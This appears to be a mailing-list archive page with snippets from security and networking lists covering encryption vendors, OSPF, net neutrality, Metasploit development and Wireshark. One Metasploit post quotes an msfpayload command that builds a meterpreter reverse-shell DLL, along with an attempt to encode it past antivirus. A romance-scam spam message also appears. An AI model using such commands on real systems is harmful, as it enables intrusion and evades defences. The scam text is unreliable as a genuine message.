I'm about to roll-out SecureDoc by WinMagic. I've delayed our
deployment only because of usability issues on Windows 7/Vista. It has
a feature to synchronize the password for the encryption key (file) with
the operating system password that I am keen on using. It worked solid
with XP but had problems with Vista/7 (because of move from the GINA to
the "credential provider" model, I suppose). I just now have a version
that works...

Re: Question about Endpoint Encryption James Farr '05 (Sep 02)
I have looked at several vendors. I am concerned about laptops, but also so
removable media encryption. I see all the desktops out there and all those
flash drives, CDs and DVDs. The likelihood of finding out about a
lost/stolen $10 flash drive is much less than a $$$ laptop.

Right now the two vendors that are at the top of my list are Credant
Technologies and PGP. I will be interested others experience and what
solutions others are...

Re: Question about Endpoint Encryption Roger Safian (Sep 02)

FWIW we used to use Pointsec. It was a decent product, and I thought the
support we got from both

Pointsec and our local reseller was really first class. Once Pointsec was
bought by Checkpoint, things

Just went downhill fast.

This year we re-negotiated our anti-viral contract with Symantec. As part
of the negotiation we secured

A special price for the encryption product. It works better, has a nice
management interface, and, best

of...

Re: Question about Endpoint Encryption Hanson, Mike (Sep 02)
Gregory,

We use Checkpoint endpoint protection and I can say I do not recommend it.
The product was originally from Pointsec and they were a small and
responsive company with a decent product. Then Checkpoint bought them and it
has been more or less downhill since then. Checkpoint is supposedly doing a
complete rewrite of the product now to address problems. We currently have
three different versions of Checkpoint running, since each version is...

Re: Question about Endpoint Encryption Joel Rosenblatt (Sep 02)
Hi,

We are using GE and have not had these kinds of problems .. the only time we see failures is when there are underling
hardware problems or when the wrong
version of the product gets installed.

Your welcome to pick our brains (for what that is worth :-) - Let me know offline and I'll put you touch with my GE
expert.

Thanks,
Joel Rosenblatt

Joel Rosenblatt, Manager Network & Computer Security
Columbia Information Security Office...

Re: Question about Endpoint Encryption David Grisham (Sep 02)
Thank you Gregory,
We purchased McAfee Total Protection suite (endpoint encryption, DLP, device control). We wanted central control from
EPO. So we were sold and installed the latest Version 6. That version turned out to be really a version 1 rewrite and
our pilot found too many problems to deploy across the enterprise.
-- Also we were told we could use DLP with version 6 when we purchased. Turns out that feature won't be released until...

Cert Service Topic of September 14 InCommon Online Forum Valerie Vogel (Sep 02)
----------
InCommon Online Forum: The InCommon Cert Service
Tuesday, September 14, 2010
1 p.m. EDT / Noon CDT / 11 a.m. MDT / 10 a.m. PDT
http://www.incommon.org/
----------

InCommon has launched a new certificate service, providing unlimited
certificates at one low fee. The research and higher education community
developed this service for pragmatic reasons (primarily to reduce costs)
and innovative reasons (the first real step toward signed...

Question about Endpoint Encryption Gregory N Pendergast (Sep 02)
I'm looking for feedback on endpoint encryption solutions - both
products you've used or are using and your experiences. VCU purchased
GuardianEdge some time ago, but we've run into a number of problems that
have delayed our deployment and caused me to lose confidence in the
product, to the point that I'm considering dropping it and looking for a
different solution. The problems we've encountered are generally
post-installation failures...

Re: attempts sending fake phishing messages to students and/or employees Morrow Long (Sep 02)
Thanks. We liked RIT's idea of having a student walk around in a fish
costume and used it for phishing (as well as social networking
security) awareness for frosh orientation (and other personal
appearances):

http://www.yaledailynews.com/news/2010/sep/02/new-its-mascot-hooks-freshmen/

- Morrow

Re: firewall requirements for applications Charles Buchholtz (Sep 01)
Here are some factors that may be involved in decision/policy to
require different levels of firewall for different applications:

Ingress restrictions

1) Do the applications have the same level of design / code review?

2) Do the applications have the same level of change management / review ?

3) Does the operating environment (OS, libraries, configuration) have
the same security model / review?

4) Does the operating environment (OS,...

Internet Issues and Infrastructure

NANOG — The North American Network Operators' Group discusses fundamental Internet infrastructure issues such as routing, IP address allocation, and containing malicious activity.

Re: largest OSPF core Randy Bush (Sep 02)
i believe the original poster asked about actual operating deployment,
not theory.

and, i suspect one wants to know about full mesh under real load, i.e.
topology change, which can be exciting when one gets to a network of
significant size.

randy

Re: Road Runner Abuse Contact William Pitcock (Sep 02)
Quoting that website:

| The Postmaster team is part of the Road Runner Mail Operations
| team, and we are responsible for blocking and filtering mail
| that transits our servers; however, while we have an active
| Abuse organization and work closely with them, this is not the
| place to report incidents of spam or abuse coming from Road
| Runner's mail servers or from our network in general, as Abuse
| is a separate organization here.

William

Re: Road Runner Abuse Contact J.D. Falk (Sep 02)
http://postmaster.rr.com/ is a good place to start.

Re: ISP port blocking practice Zhiyun Qian (Sep 02)
You are exactly right. We also talked about stateful firewall that can protect the GoodNet. For NAT box, depends on the
type of NAT, it is possible to setup port forwarding on the router (mostly home routers) via uPnP without any
authentication (I think many home routers are like this by default). And since the machine in GoodNet is also
compromised, it would not be difficult to achieve this.

Regards.
-Zhiyun

Re: ISP port blocking practice William Herrin (Sep 02)
If I understand your idea correctly:

1. GoodNet filters TCP destination port 25 packets from his customer
PwndBox, preventing PwndBox from spamming.

2. BadGuy on BadNet sends a forged TCP SYN packet to SpamVictim
allegedly from PwndBox on GoodNet.

3. PwndBox receives the response packets from SpamVictim and tunnels
them to BadGuy allowing BadGuy to complete the spam.

4. GoodNet didn't stop it because PwndBox never sent any packets to TCP port...

Re: ISP port blocking practice Zhiyun Qian (Sep 02)
Sorry for bringing this old topic back. But we have made some academic effort investigating the spamming behaviors
using assymetric routing (we named it "triangualr spamming"). This work appeared in this year's IEEE Security & Privacy
conference. You can take a look at it if you are interested (and feedbacks are welcome):

http://www.eecs.umich.edu/~zhiyunq/pub/oakland10_triangular-spamming.pdf

One of the high-level findings is...

Re: largest OSPF core Mark Smith (Sep 02)
Presuming OSPF and IS-IS SPF costs are fairly similar, the following
page from "The complete IS-IS routing protocol" (really quite a good
book, a bit of a shame that there are occasional minor errors that
better technical editing would have picked up) shows that relatively
modern (although a number of years old now) routers can perform SPF
calcs on SPF databases with 10000 routers and 25000 links in less than
a second. From that, it...

Re: largest OSPF core Chuck Anderson (Sep 02)
Seems silly to migrate your existing OSPFv2 to an extra instance of
OSPFv3, leaving 2 separate OSPFv3 instances. Why not just stick with
your existing OSPFv2 and add OSPFv3 for IPv6? Or if you want to
migrate your IPv4 IGP, go directly to IS-IS so you can have a single
link-state database, single process, etc. for both IPv4 and IPv6.

RE: largest OSPF core Deepak Jain (Sep 02)
.

http://www.cisco.com/web/strategy/docs/gov/OSPFv3_aag.pdf

Thank you. Apparently Cisco supports it (or something like it) too.

Deepak

Re: Road Runner Abuse Contact Andrew Kirch (Sep 02)
Did you call Chuck Jones?

Re: Road Runner Abuse Contact harbor235 (Sep 02)
I always feel bad when roadrunners get abused .........

Road Runner Abuse Contact Brad Fleming (Sep 02)
Any Road Runner abuse reps on the list?

If so, could you please contact me off-list?

Re: Level3 Contact Alan Bryant (Sep 02)
Beth Manning
Beth.Manning () level3 com

Re: largest OSPF core Owen DeLong (Sep 02)
Sent from my iPad

You left out the option of using ospf3 to do both v4 and v6. Works on juniper and foundry at least.

Owen

Level3 Contact Nick Olsen (Sep 02)
Anyone have a Level3 sales contact?
I've called the 800 number and was told I would get a call in 48 hours, a
week later, and a second call into them and I still haven't gotten a call
back.

Nick Olsen
Network Operations
(321) 205-1100 x106

Interesting People — David Farber moderates this list for discussion involving internet governance, infrastructure, and any other topics he finds fascinating

Hello dear Victoria Goodluck (Aug 15)
Nice to meet you.
My name is miss Victoria.i saw your profile today became intrested in you,i will also like to know more about you,and i
want you to send a mail to my email address so that i can give you my picture for you to know whom l am. .i believe we
can move from here.I am waiting to here from you. above all remeber that distance or colour does not matter but love
matters alot in life.
Please reply me back.yours VICTORIA

FCC Calls Off Net Neutrality Talks Dave Farber (Aug 05)
Begin forwarded message:

> From: Richard Forno <rforno () infowarrior org>
> Date: August 5, 2010 1:27:48 PM PDT
> To: List Infowarrior <infowarrior () attrition org>
> Cc: Farber Dave <dave () farber net>
> Subject: FCC Calls Off Net Neutrality Talks
>

> FCC Calls Off Net Neutrality Talks
>
> http://online.wsj.com/article/SB10001424052748703748904575411632530886558.html?
>
> By AMY SCHATZ...

re eGoogle and Verizon in Talks on Selling Internet Priority - NYTimes.com Dave Farber (Aug 05)
Begin forwarded message:

> From: Andrew C Burnette <acb () acb net>
> Date: August 5, 2010 11:04:02 AM PDT
> To: dave () farber net
> Subject: Re: [IP] Google and Verizon in Talks on Selling Internet Priority - NYTimes.com
>

> Dave,
>
> for IP if you wish.
>
> I would guess this could be overlap of timing between the FCC
> discussions and the always ongoing issues of interconnectivity (peering)
> in...

Re yum yum who wanted to meet me while I am in Portland and sent email apple mail loses mail yet again Dave Farber (Aug 05)
Begin forwarded message:

> From: Mikki Barry <ooblick () ego org>
> Date: August 5, 2010 10:41:33 AM PDT
> To: "dave () farber net" <dave () farber net>
> Subject: Re: [IP] Re yum yum who wanted to meet me while I am in Portland and sent email apple mail loses mail yet
> again
>

> You know, Dave, we must not be the only people who have had apple mail losing our email. I have been around and
>...

paper on technology manias and gullibility, of some interest to IP list Dave Farber (Aug 05)
Begin forwarded message:

> From: Andrew Odlyzko <odlyzko () umn edu>
> Date: August 5, 2010 10:11:06 AM PDT
> To: dave () farber net
> Subject: paper on technology manias and gullibility, of some interest to IP list
>

> Dave,
>
> Since the readers of the IP list are discussed in Section 5 of this
> paper, they might like to learn of it directly, so they have a chance
> to react.
>
> Best regards,...

some "facts" Verizon, Too! re GOOGLE DENIES IT--Google and Verizon in Talks on Selling Internet Priority - NYTimes.com Dave Farber (Aug 05)
Begin forwarded message:

> From: "Sullivan, Michael" <MSullivan () wbklaw com>
> Date: August 5, 2010 9:07:52 AM PDT
> To: "dave () farber net" <dave () farber net>
> Subject: RE: [IP] Verizon, Too! re GOOGLE DENIES IT--Google and Verizon in Talks on Selling Internet Priority -
> NYTimes.com
>

> Both Verizon and Google have specifically said the NY Times article got it all wrong.
>
>...

re GOOGLE DENIES IT--Google and Verizon in Talks on Selling Internet Priority - NYTimes.com Dave Farber (Aug 05)
Begin forwarded message:

> From: h_bray () globe com
> Date: August 5, 2010 8:42:21 AM PDT
> To: dave () farber net
> Cc: ip <ip () v2 listbox com>
> Subject: Re: [IP] GOOGLE DENIES IT--Google and Verizon in Talks on Selling Internet Priority - NYTimes.com
>

> FWIW, Google says the NY Times story is "quite simply wrong."
>
> http://www.pcmag.com/article2/0,2817,2367436,00.asp
>
>
>...

re Google and Verizon in Talks on Selling Internet Priority - NYTimes.com Dave Farber (Aug 05)
Begin forwarded message:

> From: George Ou <George.Ou () digitalsociety org>
> Date: August 5, 2010 8:06:09 AM PDT
> To: "dave () farber net" <dave () farber net>
> Subject: RE: [IP] Google and Verizon in Talks on Selling Internet Priority - NYTimes.com
>

> For IP if you wish.
>
> This story is devoid of facts and self contradictory.
>...

Re yum yum who wanted to meet me while I am in Portland and sent email apple mail loses mail yet again Dave Farber (Aug 05)
Dave

-------------------------------------------
Archives: https://www.listbox.com/member/archive/247/=now
RSS Feed: https://www.listbox.com/member/archive/rss/247/
Modify Your Subscription: https://www.listbox.com/member/?member_id=18849915&id_secret=18849915-aa268125
Unsubscribe Now: https://www.listbox.com/unsubscribe/?member_id=18849915&id_secret=18849915-32545cb4
Powered by Listbox: http://www.listbox.com

Google and Verizon in Talks on Selling Internet Priority - NYTimes.com Dave Farber (Aug 05)
http://www.nytimes.com/2010/08/05/technology/05secret.html?_r=1

For a change -- I will not say " I told you so". Djf

-------------------------------------------
Archives: https://www.listbox.com/member/archive/247/=now
RSS Feed: https://www.listbox.com/member/archive/rss/247/
Modify Your Subscription: https://www.listbox.com/member/?member_id=18849915&id_secret=18849915-aa268125
Unsubscribe Now:...

Google, Verizon, the FCC and Net Neutrality Dave Farber (Aug 04)
Begin forwarded message:

> From: Gene Gaines <gene.gaines () gainesgroup com>
> Date: August 4, 2010 9:33:59 PM PDT
> To: David Farber <dave () farber net>
> Subject: Google, Verizon, the FCC and Net Neutrality
>

> Two views of a stunningly important issue
>
> FIRST: From the New York Times, Aug 4, 2010:
>
> Google and Verizon in Talks on Selling Internet Priority
>
> WASHINGTON — Google and...

Outsourcing We Can Believe In Dave Farber (Aug 04)
Begin forwarded message:

> From: Randall Webmail <rvh40 () insightbb com>
> Date: August 4, 2010 2:28:51 PM PDT
> To: johnmacsgroup () yahoogroups com, dewayne () warpspeed com, dave () farber net
> Subject: Outsourcing We Can Believe In
>

> U.S. To Train 3,000 Offshore IT Workers
>
> $22 million, federally-backed program aims to help outsourcers in South Asia become more fluent in areas like Java
>...

Book review: Skating on Stilts - WSJ.com Dave Farber (Aug 04)
http://online.wsj.com/article/SB10001424052748703545604575407380884722858.html

-------------------------------------------
Archives: https://www.listbox.com/member/archive/247/=now
RSS Feed: https://www.listbox.com/member/archive/rss/247/
Modify Your Subscription: https://www.listbox.com/member/?member_id=18849915&id_secret=18849915-aa268125
Unsubscribe Now:...

So they lied. This is surprising why? Dave Farber (Aug 04)
Begin forwarded message:

> From: Randall Webmail <rvh40 () insightbb com>
> Date: August 4, 2010 8:36:43 AM PDT
> To: johnmacsgroup () yahoogroups com, dewayne () warpspeed com, dave () farber net
> Subject: So they lied. This is surprising why?
>

> "For the last few years, federal agencies have defended body scanning by insisting that all images will be discarded
> as soon as they're viewed. The...

YUM YUM Dave Farber (Aug 03)
That is Jakes in Portland Oregan

Begin forwarded message:

> From: Dave Farber <dave () farber net>
> Date: August 3, 2010 4:41:04 PM PDT
> To: ip <ip () v2 listbox com>
> Subject: [IP] YUM YUM
> Reply-To: dave () farber net
>

> I am sitting at Jakes having finished a bowl of Manhatten clam chowder.
>
> Wonderful
>
>
> -------------------------------------------
> Archives:...

The RISKS Forum — Peter G. Neumann moderates this regular digest of current events which demonstrate risks to the public in computers and related systems. Security risks are often discussed.

Risks Digest 26.14 RISKS List Owner (Aug 30)
RISKS-LIST: Risks-Forum Digest Monday 30 August 2010 Volume 26 : Issue 14

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.14.html>
The current issue can be...

Risks Digest 26.13 RISKS List Owner (Aug 02)
RISKS-LIST: Risks-Forum Digest Monday 2 August 2010 Volume 26 : Issue 13

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.13.html>
The current issue can be...

Risks Digest 26.12 RISKS List Owner (Jul 30)
RISKS-LIST: Risks-Forum Digest Friday 30 July 2010 Volume 26 : Issue 12

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.12.html>
The current issue can be...

Risks Digest 26.11 RISKS List Owner (Jul 21)
RISKS-LIST: Risks-Forum Digest Wednesday 21 July 2010 Volume 26 : Issue 11

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.11.html>
The current issue can be...

Risks Digest 26.10 RISKS List Owner (Jul 10)
RISKS-LIST: Risks-Forum Digest Saturday 10 July 2010 Volume 26 : Issue 10

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.10.html>
The current issue can be...

Risks Digest 26.09 RISKS List Owner (Jul 03)
RISKS-LIST: Risks-Forum Digest Saturday 3 July 2010 Volume 26 : Issue 09

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.09.html>
The current issue can be...

Risks Digest 26.08 RISKS List Owner (Jun 10)
RISKS-LIST: Risks-Forum Digest Thursday 10 June 2010 Volume 26 : Issue 08

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.08.html>
The current issue can be...

Risks Digest 26.07 RISKS List Owner (May 29)
RISKS-LIST: Risks-Forum Digest Saturday 29 May 2010 Volume 26 : Issue 07

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.07.html>
The current issue can be...

Risks Digest 26.06 RISKS List Owner (May 08)
RISKS-LIST: Risks-Forum Digest Saturday 8 May 2010 Volume 26 : Issue 06

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.06.html>
The current issue can be...

Risks Digest 26.05 RISKS List Owner (May 04)
RISKS-LIST: Risks-Forum Digest Tuesday 4 April 2010 Volume 26 : Issue 05

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.05.html>
The current issue can be...

Risks Digest 26.04 RISKS List Owner (Apr 28)
RISKS-LIST: Risks-Forum Digest Wednesday 28 April 2010 Volume 26 : Issue 04

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.04.html>
The current issue can be...

Risks Digest 26.03 RISKS List Owner (Apr 25)
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.03.html>
The current issue can be found at
<http://www.csl.sri.com/users/risko/risks.txt>

Contents:...

Risks Digest 26.02 RISKS List Owner (Apr 18)
RISKS-LIST: Risks-Forum Digest Sunday 18 April 2010 Volume 26 : Issue 02

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.02.html>
The current issue can be...

Risks Digest 26.01 RISKS List Owner (Apr 08)
RISKS-LIST: Risks-Forum Digest Thursday 8 April 2010 Volume 26 : Issue 01

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.01.html>
The current issue can be...

Data Loss — Data Loss covers large-scale personal data loss and theft incidents. This archive combines the main list (news releases) and the discussion list.

Open Source Tool Development

Metasploit — Development discussion for Metasploit, the premier open source remote exploitation tool

Re: Dynamically Generated Final Stages Ty Miller (Sep 02)
Perfect. I was after the "generate_stage" function.

Thanks,
Ty

Re: Dynamically Generated Final Stages egypt (Sep 02)
If I understand you correctly, you can look at passivex for an example
of what you want. Basically you need to tell the framework that the
final stage is not transmitted over the stager connection as with
normal stagers. Then call generate_stage to get the final payload.

Hope this helped,
egypt

Re: Dynamically Generated Final Stages tyronmiller (Sep 02)
Hey Philip,

Thanks for sending through the new link, as well as your response. I have
gone through the code and I don't think this was what I was after.
Appreciated anyway.

Let me see if I can be clearer in what I am after:

I have added my payload module called "awesome_payload" to my msf
installation. In msfconsole, when I type "search awesome_payload" I get the
following:

windows/dllinject/awesome_payload...

Re: middle stage listener and threads Ty Miller (Sep 01)
Hey guys,

Noone had any threads/shellcode experience?

Threads look like they would be cleaner on Windows; however, SK pointed me
to his phrack article talking about how to do Windows forking (
http://www.phrack.org/issues.html?id=7&issue=62). This refers to an article
by LSD which doesn't seem to be there anymore (
http://lsd-pl.net/windows_components.html) ... If anyone has this article,
then can you pass it on or point me in the right...

problem metasploit on iphone 3G robert (Sep 01)
hello guys,

I have problem with "show exploits" on my iphone!
The another show payloads works good en show nops works good, only problem with show exploits!
What's the problem?

msf > show exploits
[-] Error while running command show: uninitialized constant Msf::Encoder::Type::SingleStaticBit

Call stack:
/usr/share/msf3/data/msfweb/vendor/rails/activesupport/lib/active_support/dependencies.rb:431:in `load_missing_constant'...

nullcon Goa dwitiya (2.0) Call For Papers nullcon (Sep 01)
nullcon Dwitiya (2.0)
The Jugaad(hacking) Conference

nullcon is an initiative by null - The open security community.

Website:
http://nullcon.net

Calling all Jugaadus(hackers)
It's the time of the year when we welcome research done by the
community as paper submissions for nullcon.
So, sip your coffee, dust your debuggers, fire your tools, challenge
your grey cells and shoot us an email.

Tracks:
---------------
- Bakkar: 1 Hr Talks
-...

Re: Fwd: return values from railgun Rob Fuller (Sep 01)
I forgot about the strict RFC compliance on this list and only replied to
you Josh, here is my reply since you referenced it:

// It really depends on the call you make and what the API call returns,
attempt your call, attaching it to a variable and see what it spits out.

Re: return values from railgun Carlos Perez (Sep 01)
Here are the results of all message box types, just look for the returned hash de key of return and read the returned
value

creturn_val = client.railgun.user32.MessageBoxA(0,"Hello","world","MB_OKCANCEL")
=> {"GetLastError"=>0, "return"=>2}

=> 2

=> Fixnum

Values for all messagebox types:

# Abort

=> {"GetLastError"=>0, "return"=>3}
# Retry

=>...

Re: Fwd: return values from railgun lazydj98 (Sep 01)
Sorry for the apparently blank message everyone
I had intended to say, if you're checking for success, I had asked a
similar question a few weeks ago, but not specific to railgun, and the
answer was, success if not exception thrown. However railgun might be
different since I'm guessing you're looking for the return codes from the
actual windows functions that get called? Either way, try what Mubix said,
altho you should be able to look...

Re: DLL name for webdav_dll_hijacker exploit anil saini (Aug 31)
I have made a dll using *"./msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.1.1 LPORT=5050 D > /temp/rpawinet.dll"* . The dll is working
and giving me meterpreter shell.

But this dll is caught by almost all anti-virus. I tried encoded this using
./msfencode but then this stoped working.
i used "*./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1
LPORT=4433 R | ./msfencode -c 13 -e x86/shikata_ga_nai - t...

Re: Dynamically Generated Final Stages Ty Miller (Aug 31)
thanks. I'll take a look and will let ya know.

Thx,
Ty

Fwd: return values from railgun Joshua Smith (Aug 31)

return values from railgun max (Aug 31)
Hi there list, i tried to use railgun in a meterpreter script. Works
fine so far for opening a msgboxa but how do i get the return values
back from the api calls?

greetings

max

Re: Host Analysis exibar (Aug 31)
Although not open source, Mandiant has a couple offerings that will do
what you want. They also have quite a few free tools that will also
perform these functions.
check them out, you'll be happy :-)

Exibar

Quoting Abhijeet Hatekar <abhi.hatekar () gmail com>:

Re: Host Analysis Abhijeet Hatekar (Aug 31)
I would like to do complete remote system analysis by scanning registry,
services, processes, handles, network ports, shadow copies, open files, live
memory details etc and look for potential threats like Viruses, Malwares,
Rootkits.

GMER, ICESword, Autoruns can be used for most of these things but i would
like to know if there is a single tool available for doing all such things.
Responder is one such tool, however i am looking for...

Wireshark — Discussion of the free and open source Wireshark network sniffer. No other sniffer (commercial or otherwise) comes close. This archive combines the Wireshark announcement, users, and developers mailing lists.

Need to decode SNMP OIDs andre.noel (Sep 02)
Hello all,

I need to decode snmp OIDs in Wireshark, but when I activate it under Name resolution I receive this error message:

Stopped processing module SNMPv2-SMI due to error(s) to prevent potential crash in libsmi.
Module's conformance level: 1.
See details at: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=560325

Is there something I do wrong ?

I'm running Wireshark 1.4.0 on windows XP.

Regards....

buildbot failure in Wireshark (development) on OSX-10.5-PowerPC buildbot-no-reply (Sep 02)
The Buildbot has detected a new failure of OSX-10.5-PowerPC on Wireshark (development).
Full details are available at:
http://buildbot.wireshark.org/trunk/builders/OSX-10.5-PowerPC/builds/955

Buildbot URL: http://buildbot.wireshark.org/trunk/

Buildslave for this Build: osx-10.5-ppc

Build Reason:
Build Source Stamp: 34043
Blamelist: etxrab

BUILD FAILED: failed failed slave lost

sincerely,
-The Buildbot

Re: VoIP calls GRAPH button gone. FLOW button shows SIP but not RTP or T.38 COHEN, HARVEY S (ATTLABS) (Sep 02)
At Anders' suggestion, I downloaded and installed
wireshark-win32-1.5.0-SVN-34038.exe from
http://www.wireshark.org/download/automated/win32/
T.38 and RTP now appear correctly in the ladder diagram.

Harvey S. Cohen
AT&T Labs, Middletown, NJ
Mobile +1-908-768-5833
Office +1-732-420-4099

-----Original Message-----
From: wireshark-users-bounces () wireshark org
[mailto:wireshark-users-bounces () wireshark org] On Behalf Of...

buildbot failure in Wireshark (development) on Ubuntu-10.04-x64 buildbot-no-reply (Sep 02)
The Buildbot has detected a new failure of Ubuntu-10.04-x64 on Wireshark (development).
Full details are available at:
http://buildbot.wireshark.org/trunk/builders/Ubuntu-10.04-x64/builds/470

Buildbot URL: http://buildbot.wireshark.org/trunk/

Buildslave for this Build: ubuntu-10.04-x64

Build Reason:
Build Source Stamp: 34041
Blamelist: etxrab

BUILD FAILED: failed run-randpkt

sincerely,
-The Buildbot

Re: VoIP calls GRAPH button gone. FLOW button shows SIP but not RTP or T.38 Keith French (Sep 02)
I have just raised this on bugzilla as bug 5172

-----Original Message-----
From: wireshark-users-bounces () wireshark org on behalf of Keith French
Sent: Thu 02/09/2010 10:37
To: Community support list for Wireshark
Subject: RE: [Wireshark-users] VoIP calls GRAPH button gone. FLOW button shows SIP but not RTP or T.38

I have a similar problem with 1.4.0 and the latest development release 1.5.0 SVN 34041. There are two identical H323
calls in...

Re: VoIP calls GRAPH button gone. FLOW button shows SIP but not RTP or T.38 Keith French (Sep 02)
I have a similar problem with 1.4.0 and the latest development release 1.5.0 SVN 34041. There are two identical H323
calls in my trace, the FLOW graphs work fine for both displaying the H225, H245 & RTP. However, on one call Prepare
Filter only shows the H225, but on the other call it shows H225, H245 & RTP.

I'll raise it on bugzilla & attach my trace.

Keith French.

-----Original Message-----
From: wireshark-users-bounces ()...

Re: library wireshark in ruby Stephen Fisher (Sep 01)
This question comes up on a regular basis on this list. usually. There
is no documentation on using libwireshark's dissection API other than
the source code and developer's documentation. That library is not
designed with use outside Wireshark in mind, though it is possible as
long as GPL guidelines (under which it's licensed) are adhered to.

Re: Export to CSV Bill Meier (Sep 01)
Jaap Keuter wrote:

I was mistaken: The problem does occur on Windows.

A similar (but not quite the same) issue exists for exporting psml files.

The "PSML structure" is written at the beginning of the file only for
the first file written. Any following psml exported files will not have
the structure.

(There's a "static gboolean structure_written = FALSE;" in
proto_tree_write_psml() ...).

I'll fix both of these...

Re: Export to CSV Stig Bjørlykke (Sep 01)
I also found some issues exporting as PSML. The second time a PSML
file is saved it's missing the headers.

I'll fix both cases :)

Re: Export to CSV Jaap Keuter (Sep 01)
Send from my iPhone

Because... ? (don't have the code at hand right now)

Thanks,
Jaap

Re: Export to CSV Bill Meier (Sep 01)
Stig Bjørlykke wrote:

The actual issue is that the header fields are output only if
the output includes the first packet (#1) of the capture (however the
packet range is selected and independent of filters, etc).

This bug occurs only on on platforms other than Windows.

Re: VoIP calls GRAPH button gone. FLOW button shows SIP but not RTP or T.38 Anders Broman (Sep 01)
Hi,
Could you trye it on a development build from http://www.wireshark.org/download/automated/
it might be related to http://anonsvn.wireshark.org/viewvc/viewvc.cgi?view=rev&revision=33525
Please let us know the result.
Regards
Anders

________________________________
From: wireshark-users-bounces () wireshark org [mailto:wireshark-users-bounces () wireshark org] On Behalf Of COHEN,
HARVEY S (ATTLABS)
Sent: den 31 augusti 2010 22:00
To:...

Re: Wireshark sniffer stop by itself Bill Meier (Sep 01)
Bill Meier wrote:

Addendum:

Re:

>> ...., the sniffer didn't stop working
>> completely but only the capture stop.

Do you mean that the Wireshark GUI was still running and responding ?

If so: then I don't know what happened.

I would still try using Dumpcap by itself to see if the problem still
occurs.

How to decode FP over UDP? wang . hongxia1 (Sep 01)
I am using Wireshark version 1.2.9. I have some FP packets in pcap
format. However I do not see FP protocol option in "decode as" list.
However Enabled protocols， shows FP protocolsenabled which indicates
Wireshark supports fp. I fill "fp" in filters,I can not get no Packets
filtered.Howerver,I see some packets over UDP transported from RNC.

Please tell me how can I decode packets as FP.
Those sample fp packets...

Re: Wireshark sniffer stop by itself Bill Meier (Sep 01)
גוטליב טובים אסף wrote:

Please see: http://wiki.wireshark.org/KnownBugs/OutOfMemory

Wireshark accumulates "state" during a capture and thus will eventually
run out of memory during an extended capture.

It would be better to use Dumpcap If you want to do an extended capture.

Dumpcap just captures the data and writes it to a file.
